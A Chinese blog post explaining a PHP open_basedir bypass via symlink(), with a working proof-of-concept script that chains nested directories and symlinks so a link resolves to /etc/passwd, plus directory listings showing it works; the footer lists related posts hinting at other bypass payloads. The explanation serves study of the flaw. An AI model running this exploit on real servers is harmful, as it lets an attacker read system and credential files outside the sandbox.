symlink() open_basedir bypass 原理分析

最新推荐文章于 2023-11-27 12:16:04 发布
最新推荐文章于 2023-11-27 12:16:04 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 编程

之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。

原文:http://cxsecurity.com/issue/WLB-2009110068


ok,先来了解一下什么是open_basedir。

open_basedir 将 PHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。

当一个脚本试图用例如 fopen() 或者 gzopen() 打开一个文件时,该文件的位置将被检查。当文件在指定的目录树之外时 PHP 将拒绝打开它。所有的符号连接都会被解析,所以不可能通过符号连接来避开此限制。 

关于open_basedir的更多信息请参考:http://php.net/manual/zh/ini.core.php#ini.open-basedir


再来了解一下symlink()函数。

symlink — 建立符号连接

bool symlink ( string $target , string $link )

symlink() 对于已有的 target 建立一个名为 link 的符号连接

关于symlink()的更多信息请参考:http://php.net/manual/zh/function.symlink.php


接下来是一个例子,之所以能利用symlink()绕过open_basedir的限制,按照作者的话,这算是php的一个逻辑漏洞。

<?php
//sym.php
symlink("/etc/passwd", "./symlink");
?>

如果直接执行上面的文件,将会收到类似下面的提示:

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2

这很正常,因为open_basedir=/www/ ,而我们要访问的是/etc/passwd,很明显不在范围之内,故而被拒绝了。


先说一下测试环境:

127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php

127# pwd
/www/test


刚才用sym.php无法绕过,现在用kakao.php来测试。

<?php
//kakao.php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

成功执行kakao.php后,看一下当前目录有什么变化。

127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink


看出来了吧,多了一个链接文件和两个文件夹。此时访问文件exploit就相当于访问/etc/passwd了。

为什么这样就可以了呢?

这是PHP设计之初的一个逻辑缺陷,之所以能够访问"tmplink/../../../etc/passwd",是因为该路径真实存在,而且从头到尾没触发到open_basedir,所以当然可以访问得到。我们需要根据具体要访问的文件来构造目录,使得最终访问到的是我们想要访问的文件。





eT48_Sec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP绕过open_basedir限制操作文件的方法
12-20
`symlink()`函数允许创建符号链接,虽然通常目标路径受`open_basedir`约束。但在某些情况下,通过巧妙地构造链接,可以实现跨目录操作。例如,在Linux环境下,可以创建一系列链接,使得原本在`open_basedir`范围之外...
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5253
简单绕过open_basedir 的几种方法
bypass open_basedir
eT48_Sec
02-06 904
在了解symlink() bypass open_basedir原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。 <?php /* titile: bypass open_basedir auth: eT48 */ header("Conten-type:text/html; charset:udf-8"); error_repor
绕过open_basedir
unexpectedthing的博客
07-02 1506
open_basedir绕过
Bypass open_basedir的方法
最新发布
rev1ve的博客
11-27 1244
指定在每个 PHP 脚本执行完毕后自动追加的文件,用php伪协议去读取我们编码过的马,其中木马添加00是为了满足解码字节倍数,然后就是文件头绕过。payload构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个…题目是给了我们get_the_flag()函数的,对文件上传进行检测。,检测文件头,然后回显上传路径;symlink() 函数创建一个从指定名称连接的现存目标文件开始的符号连接。发现可以异或绕过,但是考虑限制长度,我们构造如下。本地测试一下,这里我设置的路径。
学习周报之open_basedir绕过
clearloveQAQ的博客
05-01 783
一: CTFSHOW805: 看到这个地方没有过滤信息就直接试了一下1=system(‘ls’);去读目录但是发现没反应就去看了一下phpinfo发现它是ban了很多函数然后open_basedir也开了所以这题就是要我们绕过open_basedir的题目,这类题在ctfshow命令执行的题中有出现过,就是通过glob协议进行目录读取,但是我忘了所以又重新学了一下glob协议的用法 glob伪协议 1=$a="glob:///*"; if($b=opendir($a)){ w..
xfs_symlink_remote.rar_单片机开发_Unix_Linux_
08-11
标题 "xfs_symlink_remote.rar_单片机开发_Unix_Linux_" 提示我们这个压缩包文件可能包含与单片机开发、Unix和Linux操作系统相关的源代码或文档,特别是涉及到XFS文件系统的软链接(symlinks)在远程操作中的应用。...
xfs_symlink.rar_Only
09-14
本文将深入探讨该版本中与XFS软链接相关的"only"函数,通过分析`xfs_symlink.c`和`xfs_symlink.h`这两个关键文件,揭示XFS软链接的实现细节。 一、XFS软链接的基础概念 软链接(也称为符号链接),是Linux文件系统...
SymLink 工业通信网关使用说明.pdf
04-06
SymLink 工业通信网关使用说明,
PHP之如何绕过open_basedir
shy的博客
11-27 1413
open_basedir php.ini中原文的说明是: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *N...
Bypass open_basedir
qq_44657899的博客
10-19 1497
文章目录利用chdir()与ini_set()组合Bypass利用glob://伪协议Bypass 利用chdir()与ini_set()组合Bypass payload: 获取目录: ?a=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_
[SUCTF 2019]EasyWeb(bypass open_basedir
paidx0
11-08 223
<?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILES["file"])){
HttpURLConnection下载文件为空
11-22 595
HttpURLConnection下载文件为空
绕过open_basedir读文件脚本
一个码农的笔记
11-13 3402
参加了一场2016年的sycsec感觉又学到不少东西 废话不多说,首先啥是open_basediropen_basedir: 将用户可操作的文件限制在某目录下 具体的设置方法可以参考:http://blog.csdn.net/white__cat/article/details/32734343 这样设置之后,原则上被限制之外的目录是无法读写文件的,但是有一个漏洞却打破了这个限制 参
open_basedir restriction in effect
showso2006的专栏
09-01 7560
<br />open_basedir: 将用户可操作的文件限制在某目录下;<br /> --------------------------------------------------------------------------------<br /> 如下是php.ini中的原文说明以及默认配置:<br /> ; open_basedir, if set, limits all file operations to the defined directory<br /> ; and bel
『CTF Tricks』PHP-绕过open_basedir
Ho1aAs‘s Blog
09-10 2083
读取目录:DirectoryIterator类 + glob://协议;FilesystemIterator类 + glob://协议;读取文件:ini_set() + 相对路径;shell命令执行;symlink();
突破open_basedir进行列举目录
weixin_43999372的博客
11-07 441
open_basedir open_basedir 是php设置中为了防御php跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。 利用DirectoryIterator + Glob 直接列举目录 Dire...
从0学习bypass open_basedir姿势1
08-03
在学习过程中,我们需要先了解 open_basedir原理和作用,同时需要掌握一些实用的绕过技巧。 首先,我们可以通过一些 php 函数和技巧来绕过 open_basedir 的限制。比如可以使用 symlink 来访问受限目录外的文件,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值